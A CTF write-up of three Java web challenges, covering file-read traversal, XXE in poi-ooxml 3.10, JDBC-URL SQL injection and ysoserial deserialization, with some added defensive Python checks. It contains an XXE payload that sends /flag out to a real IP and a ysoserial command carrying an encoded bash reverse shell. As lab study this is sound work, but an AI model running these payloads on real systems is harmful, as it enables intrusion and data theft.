Reproducing some Java web challenges
Preface
Write-ups of some Java challenges from BUUOJ (continuously updated)
[RoarCTF 2019]Easy Java
There is an arbitrary file read; use it to read WEB-INF/web.xml.
This gives web.xml:
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>
There is a Flag route, so read FlagController.class next.
Once it is read out, decompile it online:
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@WebServlet(
    name = "FlagController"
)
public class FlagController extends HttpServlet {
    String flag = "ZmxhZ3s4NzBlMDVjMi03NGUwLTQwNjMtOGFkNy0xNmQ1MTUyMWVlNGR9Cg==";

    protected void doGet(HttpServletRequest var1, HttpServletResponse var2) throws ServletException, IOException {
        PrintWriter var3 = var2.getWriter();
        var3.print("<h1>Flag is nearby ~ Come on! ! !</h1>");
    }
}
The flag is right there (the base64 string in the class).
[网鼎杯 2020 青龙组]filejava
After entering, the download feature turns out to have an arbitrary file read:
/DownloadServlet?filename=../../../../WEB-INF/web.xml
Read the web.xml file:
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0">
<servlet>
<servlet-name>DownloadServlet</servlet-name>
<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>ListFileServlet</servlet-name>
<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>ListFileServlet</servlet-name>
<url-pattern>/ListFileServlet</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>UploadServlet</servlet-name>
<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
</web-app>
There are three servlets in total; read them all out and decompile them with JD-GUI.
The important part is in upload.java:
if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook saveFilename = WorkbookFactory.create(in);
        Sheet realSavePath = saveFilename.getSheetAt(0);
        System.out.println(realSavePath.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}
This mentions poi-ooxml-3.10,
and that version happens to have an XXE vulnerability.
For details see https://xz.aliyun.com/t/6996#toc-3
The vulnerable code is only reached if the upload is an xlsx and the filename starts with excel-.
Create a new xlsx, open it as a zip archive, and modify [Content_Types].xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://47.97.123.81/xml.dtd">
%remote;%int;%send;]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/><Override PartName="/xl/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/xl/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
Then write xml.dtd on your own VPS:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://47.97.123.81:11452?p=%file;'>">
Then start listening, upload the file, and the flag comes back.
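A server-side pre-check for this kind of upload, as an added example that is not the challenge's code: before an xlsx is handed to POI, unpack it and reject any XML part that declares a DOCTYPE or entity, since a genuine spreadsheet never needs one. The sample packages are constructed inline and the DTD host is a placeholder.

```python
import io
import re
import zipfile

# Any DOCTYPE or ENTITY declaration inside an OOXML part is a red flag:
# a real spreadsheet never carries one, and poi-ooxml 3.10 would honour it.
DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
XML_PART = re.compile(r"\.(xml|rels)$", re.IGNORECASE)


def find_dtd_parts(xlsx_bytes):
    """Return the names of XML parts inside an xlsx that contain a DOCTYPE or ENTITY declaration."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if not XML_PART.search(info.filename):
                continue
            if DTD_MARKERS.search(zf.read(info)):
                flagged.append(info.filename)
    return flagged


def build_sample(content_types_xml):
    """Constructed minimal package: just [Content_Types].xml plus an empty workbook part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


# Constructed samples: a clean content-types part, and one shaped like the
# writeup's payload but pointing at a placeholder host.
CLEAN = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
         b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            b'<!DOCTYPE ANY [<!ENTITY % remote SYSTEM "http://dtd-host.invalid/xml.dtd"> %remote;]>'
            b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')

if __name__ == "__main__":
    print("clean  :", find_dtd_parts(build_sample(CLEAN)))
    print("payload:", find_dtd_parts(build_sample(WITH_DTD)))
```

This complements, rather than replaces, upgrading poi-ooxml past 3.10 and disabling DTD processing in the XML parser.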
[网鼎杯 2020 朱雀组]Think Java
The class files are given directly; drop them into JD-GUI for review.
Scanning finds swagger-ui.html,
which lists three endpoints.
Judging by their function, one queries the database, one handles login, and the third, current, actually deserializes the data passed in.
To log in, the admin password has to be extracted through SQL injection.
Looking at the source, there is an obvious SQL injection, and the default database is myapp.
A quick test confirms that it works:
jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#
is parsed as
jdbc:mysql://mysqldbserver:3306/myapp
and then substituted into the SQL statement:
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '#' union select 1#' and table_name='" + TableName + "'
The first # is wrapped in single quotes and becomes an ordinary # character; the second # comments out the rest of the statement, which gives the SQL injection.
So this can be used: myapp#' union select pwd from user#;
This yields the credentials; use them to log in:
{"username":"admin","password":"admin@Rrrr_ctf_asde"}
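To make the injection mechanism above concrete, here is an added Python illustration (not code from the challenge): the connection layer's view of the JDBC URL stops at the first #, while application code that takes the database name from the raw string keeps everything after the last / (an assumption about how the app extracts it), so the injected text reaches the query. The strict identifier check shown alongside is the hardened counterpart; all function names are hypothetical.

```python
import re

# What MySQL allows in an unquoted identifier: letters, digits, underscore, dollar sign.
SAFE_IDENTIFIER = re.compile(r"^[A-Za-z0-9_$]+$")


def driver_view(jdbc_url):
    """What the connection layer sees: '#' starts a URL fragment, so everything after it is dropped."""
    return jdbc_url.split("#", 1)[0]


def db_name_from_raw(jdbc_url):
    """What naive application code does (assumed): the database name is everything after the last '/'."""
    return jdbc_url.rsplit("/", 1)[1]


def build_query_unsafe(db_name, table_name):
    """String concatenation as in the challenge: the name lands inside the quotes unescaped."""
    return ("Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '"
            + db_name + "' and table_name='" + table_name + "'")


def validated_db_name(jdbc_url):
    """Hardened variant: the name must be a plain identifier before it can reach any SQL."""
    name = db_name_from_raw(jdbc_url)
    if not SAFE_IDENTIFIER.match(name):
        raise ValueError("database name is not a plain identifier: %r" % name)
    return name


if __name__ == "__main__":
    url = "jdbc:mysql://mysqldbserver:3306/myapp#' union select 1#"
    print("driver sees :", driver_view(url))
    print("query built :", build_query_unsafe(db_name_from_raw(url), "user"))
    try:
        validated_db_name(url)
    except ValueError as exc:
        print("rejected    :", exc)
```

In the Java app the value should additionally be bound as a PreparedStatement parameter rather than concatenated.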
After logging in, data is a Java serialized blob, used as a Bearer token.
Submitting this data to current returns "operation successful", which shows that the endpoint deserializes it. So build a serialized string of our own.
The data is first base64-decoded and then converted to hex:
# The original used Python 2 (.encode('hex')); this form runs on Python 3
import base64
import binascii
a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
b = binascii.hexlify(base64.b64decode(a)).decode()
print(b)
The following markers can be used to recognize serialized data:
If a piece of data starts with rO0AB, you can be fairly sure it is base64-encoded Java serialized data.
And if it starts with aced, it is the hex form of the same Java serialized data.
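An added Python helper (not from the writeup) that turns those two markers into a check a defender can run on incoming tokens: it decodes either form, verifies the stream magic and version, and pulls out the root class name, which is what a deserialization allowlist (ObjectInputFilter-style) would compare against. The token is the one from the login response above; the allowlist entry and function names are assumptions.

```python
import base64
import binascii
import struct

STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = 5
TC_OBJECT, TC_CLASSDESC, TC_ARRAY = 0x73, 0x72, 0x75

# Token returned by the challenge's login endpoint (taken from the writeup).
SAMPLE_TOKEN = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
# The same stream in the hex form the writeup's snippet prints.
SAMPLE_HEX = binascii.hexlify(base64.b64decode(SAMPLE_TOKEN)).decode()


def decode_blob(text):
    """Accept both markers from the writeup: base64 starting with rO0AB, or hex starting with aced."""
    s = text.strip()
    if s.lower().startswith("aced"):
        return binascii.unhexlify(s)
    if s.startswith("rO0AB"):
        return base64.b64decode(s)
    return None


def root_class_name(data):
    """Class name of the root object in a Java serialization stream, or None if it is not one.
    Layout: magic(2) version(2) TC_OBJECT TC_CLASSDESC name_len(2) name(name_len) ..."""
    if len(data) < 8 or data[:2] != STREAM_MAGIC:
        return None
    if struct.unpack(">H", data[2:4])[0] != STREAM_VERSION:
        return None
    if data[4] not in (TC_OBJECT, TC_ARRAY) or data[5] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", data[6:8])
    name = data[8:8 + name_len]
    if len(name) != name_len:
        return None
    return name.decode("utf-8", errors="replace")


def check_token(text, allowed_classes):
    """Verdict for an incoming token: ('not-serialized', None), ('allowed', cls) or ('rejected', cls)."""
    data = decode_blob(text)
    if data is None:
        return "not-serialized", None
    cls = root_class_name(data)
    if cls in allowed_classes:
        return "allowed", cls
    return "rejected", cls


if __name__ == "__main__":
    print(check_token(SAMPLE_TOKEN, {"cn.abc.core.model.UserVo"}))  # assumed allowlist
```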
The payload can be generated with ysoserial:
https://github.com/frohoff/ysoserial
java -jar ysoserial-master-d367e379d9-1.jar ROME "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ny4xMjMuODEvMTE0NTEgMD4mMQ==}|{base64,-d}|{bash,-i}" |base64
This pops a shell directly.
I feel this is the most reliable way to pop a shell from Java; neither nc nor curl worked.